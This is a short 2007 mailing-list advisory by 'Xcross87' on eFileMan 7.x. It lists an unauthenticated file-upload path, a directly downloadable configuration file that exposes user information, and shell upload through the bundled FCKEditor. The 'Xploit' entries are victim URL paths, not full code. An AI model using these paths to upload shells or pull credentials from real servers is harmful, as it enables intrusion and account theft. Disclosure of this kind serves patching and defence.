[Vulz] eFileMan 7.x Multiple Vulnerabilities by Xcross87

Tue, 23 Oct 2007 11:03:52 -0700 

Software : eFileman

Version : 7.x (tested on 7.1.0.87-88)

Found by : Xcross87


A. Remote File Upload Vulnerability :


Xploit :


http://victim.com/[path]/upload.html

http://victim.com/[path]/cgi-bin/efileman/upload.cgi


The uploaded files are stored in :

http://victim.com/[path]/uploads/upload_file.xxx


B. Direct Access or Download Configuration File

Xploit :

http://victim.com/[path]/cgi-bin/efileman/efileman_config.pm <-- check user 
information


C. FCKEditor Inclusion.

For full pack of eFileman installation including FCKEditor, attacker can up 
shell through upload vulnerability of FCK


=== Xcross87 | HCETeam Xploiter ===

Reply via email to